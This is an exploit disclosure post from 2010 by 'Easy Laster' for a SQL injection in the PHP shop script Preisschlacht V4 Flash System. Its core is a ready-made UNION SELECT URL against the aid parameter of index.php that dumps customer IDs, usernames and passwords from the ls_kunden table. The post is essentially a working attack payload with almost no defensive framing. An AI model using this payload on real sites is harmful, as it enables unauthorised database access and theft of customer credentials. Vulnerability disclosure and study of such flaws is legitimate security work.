Home / os / winme

Preisschlacht V4 Flash System (seite&aid) index.php SQL

Posted on 15 March 2010

=================================================================
Preisschlacht V4 Flash System (seite&aid) index.php SQL Injection
=================================================================

----------------------------Information------------------------------------------------
+Name : Preisschlacht V4 Flash System SQL Injection (seite&aid) index.php
+Autor : Easy Laster
+Date   : 15.03.2010
+Script  : Preisschlacht V4 Flash System
+Price : 149.90 euro
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://www.site.com/forum/index.php?seite=17&aid=
 
+Exploitable   : http://www.site.com/forum/index.php?seite=17&aid=111111111+union+select
+1,2,concat(ID,0x3a,Benutzer,0x3a,passwort),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23+from+ls_kunden+where+id=1
 
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP